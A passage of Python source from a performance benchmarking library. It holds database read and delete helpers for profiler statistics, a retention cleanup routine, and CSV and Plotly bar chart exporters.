super(Read, self).__init__()
def select_benchmark_profiled_method_response_times(self, url: str, tcn: str, test_id: float) -> list:
"""
:param url:
:param tcn:
:param test_id:
:return:
"""
table = self.c_profiler_statistics_data_model(test_case_name=tcn)
return [
float(row.total_response_time) for row in self.execute_sql_statement(
connection_url=url,
query=select(
[
table.c.sample_id.distinct(),
table.c.total_response_time
]
).where(table.c.test_id == test_id)
)
]
def select_benchmark_profiled_method_cumulative_latency(self, url: str, tcn: str, test_id: float) -> list:
"""
:param url:
:param tcn:
:param test_id:
:return:
"""
table = self.c_profiler_statistics_data_model(test_case_name=tcn)
return [
float(row.cumulative_time) for row in self.execute_sql_statement(
connection_url=url,
query=select(
[
table.c.sample_id.distinct(),
table.c.cumulative_time
]
).where(table.c.test_id == test_id)
)
]
def select_benchmarks_with_statistics(self, url: str, tcn: str, number=options.set_max_saved_tests) -> list:
"""
:param url:
:param tcn:
:param number:
:return:
"""
table = self.c_profiler_statistics_data_model(test_case_name=tcn)
return [
float(row.test_id) for row in self.execute_sql_statement(
connection_url=url,
query=select([table.c.test_id]).distinct().limit(number).order_by(table.c.test_id.desc())
)
]
def select_validated_benchmarks(self, url: str, tcn: str, number=options.set_max_saved_tests) -> list:
"""
:param url:
:param tcn:
:param number:
:return:
"""
table = self.boundary_test_report_model(test_case_name=tcn)
return [
str(row.test_id) for row in self.execute_sql_statement(
connection_url=url,
query=select([table.c.test_id]).distinct().limit(number)
)
]
def select_count_of_all_available_benchmarks(self, url: str, tcn: str) -> int:
"""
:param url:
:param tcn:
:return:
"""
table = self.c_profiler_statistics_data_model(test_case_name=tcn)
return int(
[
row[0] for row in self.execute_sql_statement(
connection_url=url,
query=select([func.count(table.c.test_id.distinct())])
)
]
[0]
)
def select_benchmark_call_stack_by_sample_id(self, url: str, tcn: str, sample_id: str) -> list:
"""
:param url:
:param tcn:
:param sample_id:
:return:
"""
table = self.c_profiler_statistics_data_model(test_case_name=tcn)
return [
{
"uuid": row.uuid,
"test_id": row.test_id,
"test_case_name": row.test_case_name,
"sample_id": row.sample_id,
"name_of_method_under_test": row.name_of_method_under_test,
"epoch_timestamp": int(row.epoch_timestamp),
"human_timestamp": row.human_timestamp,
"child_path": row.child_path,
"child_line_number": row.child_line_number,
"child_function_name": row.child_function_name,
"parent_path": row.parent_path,
"parent_line_number": row.parent_line_number,
"parent_function_name": row.parent_function_name,
"number_of_calls": row.number_of_calls,
"total_time": float(row.total_time),
"cumulative_time": float(row.cumulative_time),
"total_response_time": float(row.total_response_time)
}
for row in self.execute_sql_statement(
connection_url=url,
query=table.select().where(
table.c.sample_id == str(sample_id)
).order_by(
table.c.cumulative_time.desc()
)
)
]
def select_benchmark_call_stack_by_test_id(self, url: str, tcn: str, test_id: float) -> list:
"""
:param url:
:param tcn:
:param test_id:
:return:
"""
table = self.c_profiler_statistics_data_model(test_case_name=tcn)
return [
{
"uuid": row.uuid,
"test_id": row.test_id,
"test_case_name": row.test_case_name,
"sample_id": row.sample_id,
"name_of_method_under_test": row.name_of_method_under_test,
"epoch_timestamp": int(row.epoch_timestamp),
"human_timestamp": row.human_timestamp,
"child_path": row.child_path,
"child_line_number": row.child_line_number,
"child_function_name": row.child_function_name,
"parent_path": row.parent_path,
"parent_line_number": row.parent_line_number,
"parent_function_name": row.parent_function_name,
"number_of_calls": row.number_of_calls,
"total_time": float(row.total_time),
"cumulative_time": float(row.cumulative_time),
"total_response_time": float(row.total_response_time)
}
for row in self.execute_sql_statement(
connection_url=url,
query=table.select().where(
table.c.test_id == str(test_id)
).order_by(
table.c.cumulative_time.desc()
)
)
]
def select_all_sample_ids_in_benchmark_by_test_id(self, url: str, tcn: str, test_id: float) -> list:
"""
:param url:
:param tcn:
:param test_id:
:return:
"""
table = self.c_profiler_statistics_data_model(test_case_name=tcn)
return [
str(row.sample_id) for row in self.execute_sql_statement(
connection_url=url,
query=select(
[
table.c.sample_id
]
).where(
table.c.test_id == test_id
).distinct()
)
]
class Delete(CommonDatabaseInteractions):
def __init__(self):
super(Delete, self).__init__()
def delete_performance_statistics_that_match_test_id(self, url: str, tcn: str, test_id: float) -> None:
"""
:param url:
:param tcn:
:param test_id:
:return:
"""
table = self.c_profiler_statistics_data_model(test_case_name=tcn)
self.execute_sql_statement(
connection_url=url,
query=table.delete().where(table.c.test_id == str(test_id))
)
class Crud(Create, Read, Delete):
def __init__(self):
super(Crud, self).__init__()
@staticmethod
def _create_default_db_url():
"""
:return:
"""
temp_directory = gettempdir()
separator = "\\" if '\\' in gettempdir() else "/"
return "sqlite:///" + temp_directory + separator + default_sqlite_database_name + ".db"
def _enforce_data_retention_policy(self, url: str, tcn: str) -> None:
"""
:param url:
:param tcn:
:return:
"""
current_number_of_test_ids = self.select_count_of_all_available_benchmarks(url, tcn)
maximum_number_of_test_ids = options.set_max_saved_tests
if current_number_of_test_ids > maximum_number_of_test_ids and \
options.enable_auto_clean_up_old_test_results is True:
oldest_test_ids = self.select_benchmarks_with_statistics(
url=url,
tcn=tcn,
number=options.set_max_saved_tests - 1
)
for test_id in oldest_test_ids:
self.delete_performance_statistics_that_match_test_id(
url=url,
tcn=tcn,
test_id=test_id
)
def _verify_and_create_relevant_tables_in_database(self, url: str, tcn: str) -> None:
"""
:param url:
:param tcn:
:return:
"""
# Models that need to be available in the _database
models = [
self.c_profiler_statistics_data_model(test_case_name=tcn),
self.boundary_test_report_model(test_case_name=tcn)
]
for table_model in models:
# verify if relevant table exists
if self.check_if_table_exists(connection_url=url, table_name=str(table_model.name)):
continue
# table does not exist creating it in _database
else:
self.spawn_table(
connection_url=url,
model=table_model
)
```
#### File: Benchmarking/statistical/result_formats.py
```python
from Benchmarking._database.collection import Crud
from Benchmarking._utilities.exceptions import UnableToExportVisualization
from datetime import datetime
import pandas as pd
import os
class CsvFile(Crud):
def __init__(self, test_case_name: str, test_id: str, database_connection_url=None, delimiter=","):
"""
Will build up the object, when no test id is given and when test case name is default.
It will take the last known test id.
:param test_case_name: The name of the test case
:param delimiter: The delimiter of the csv file
:param database_connection_url: the connection url to the _database
:param test_id: The test id within the test case
"""
super(CsvFile, self).__init__()
self.test_case_name = test_case_name
self._url = self._create_default_db_url() if database_connection_url is None else database_connection_url
self.delimiter = delimiter
self.test_id = test_id
self.list_of_samples = self.select_all_sample_ids_in_benchmark_by_test_id(
url=self._url,
tcn=test_case_name,
test_id=test_id
)
def export(self, path):
"""
Will export the csv file to a directory on the disk.
:param path: The path on disk where the file needs to be written.
Example: C:\\temp\\
"""
if os.path.isdir(path):
content = []
for sample_id in self.list_of_samples:
stack = self.select_benchmark_call_stack_by_sample_id(
url=self._url,
tcn=self.test_case_name,
sample_id=sample_id
)
for line in stack:
content.append(line)
pd.DataFrame(content).to_csv(
path_or_buf=f"{path}raw_export_of_{self.test_id}_{str(datetime.now().timestamp())}.csv",
sep=self.delimiter,
index=False
)
else:
raise UnableToExportVisualization()
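    # Hedged usage sketch (hypothetical test case name and test id):
    #   CsvFile(test_case_name="default", test_id="1642678989.251").export("C:\\temp\\")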
```
#### File: Benchmarking/visualizations/bar_graphs.py
```python
from .._utilities.exceptions import UnableToGenerateVisualizations, UnableToExportVisualization
from .._database.collection import Crud
from datetime import datetime
import plotly.graph_objects as go
import pandas as pd
import os
class BarChart(Crud):
def __init__(self, test_case_name: str, database_connection_url: str, test_ids=None, order_by="latency") -> None:
"""
:param test_case_name:
:param database_connection_url:
:param test_ids:
:param order_by:
"""
super(BarChart, self).__init__()
# Sorting out the test-id's
self.test_case_name = test_case_name
self.database_name = database_connection_url
self._order_by = order_by
if test_ids is None or type(test_ids) is not list:
raise UnableToGenerateVisualizations()
else:
self.list_of_test_ids = test_ids
# Gathering relevant performance metrics
self.statistics = {}
for tid in self.list_of_test_ids:
self.statistics[tid] = self.select_benchmark_call_stack_by_test_id(
url=database_connection_url,
tcn=test_case_name,
test_id=tid
)
self.json = self.generate_json()
def generate_json(self) -> list:
"""
:return:
"""
payload = []
for tid in self.list_of_test_ids:
for row in self.statistics[tid]:
if row['parent_function_name'] == row['sample_id']:
method_signature = row['child_function_name']
else:
method_signature = f"{row['parent_function_name']}/{row['child_function_name']}"
payload.append(
{
"sample_id": row['sample_id'],
"test_id": tid,
"method_signature": method_signature,
"latency": row['cumulative_time']
}
)
return sorted(payload, key=lambda k: k[self._order_by], reverse=True)
def render_html(self) -> str:
"""
:return:
"""
df = pd.DataFrame(self.json)
fig = go.Figure()
fig.update_layout(
title="<span style='font-size: 22px;'>Benchmarking Method Performance Bar Chart</span>",
template="ggplot2",
xaxis=dict(title_text="Test-id's"),
yaxis=dict(title_text="Time spent in seconds"),
barmode="stack",
font=dict(
size=12,
)
)
for method_signature in df.method_signature.unique():
plot_df = df[df.method_signature == method_signature]
fig.add_trace(
go.Bar(
x=[plot_df.test_id, plot_df.sample_id],
y=plot_df.latency,
name=method_signature,
meta=[method_signature],
hovertemplate='<br>Test-ID: %{x[0]}</b>'
'<br>Sample-ID: %{x[1]}</b>'
'<br>method name: %{meta[0]}</b>' +
'<br>Time Spent %{y}</b>' +
'<extra></extra>'
),
)
return fig.to_html(config={"displaylogo": False})
def export(self, path: str) -> None:
"""
Export the bar chart as a HTML report on disk.
:param path: The path on disk where the file needs to be written.
Example: C:\\temp\\
"""
if os.path.isdir(path):
name = f"BarChart-{self.test_case_name}-{datetime.now().timestamp()}"
with open(f"{path}{name}.html", 'a') as file:
file.write(self.render_html())
else:
raise UnableToExportVisualization()
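    # Hedged usage sketch (hypothetical connection URL and test id):
    #   chart = BarChart("default", "sqlite:///C:\\temp\\benchmarks.db", test_ids=["1642678989.251"])
    #   chart.export("C:\\temp\\")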
``` |